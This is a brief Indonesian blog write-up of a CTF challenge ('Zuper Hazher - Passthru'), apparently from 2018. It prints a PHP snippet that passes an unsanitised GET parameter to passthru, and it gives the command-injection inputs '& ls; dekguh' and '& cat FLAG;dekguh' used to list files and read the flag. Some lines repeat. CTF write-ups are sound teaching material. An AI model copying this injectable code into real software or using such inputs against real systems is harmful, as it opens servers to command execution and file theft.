jadi masukan perintah "& ls; dekguh" maka akan muncul list file FLAGif(isset($_GET["string"])){$string = $_GET["string"];passthru("echo " . $string . " | md5sum");}
lalu "& cat FLAG;dekguh" maka flagnya akan muncul
Saturday, December 8, 2018
[AsgamaCTF] Zuper Hazher - Passthru
disoal ini function passthru memiliki vuln, yang jadi masalah ketika memasukan perintah & ls malah terencode menjadi md5, untuk itu bisa diakali dengan delim ;.
lalu "& cat FLAG;dekguh" maka flagnya akan muncul
lalu "& cat FLAG;dekguh" maka flagnya akan muncul
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment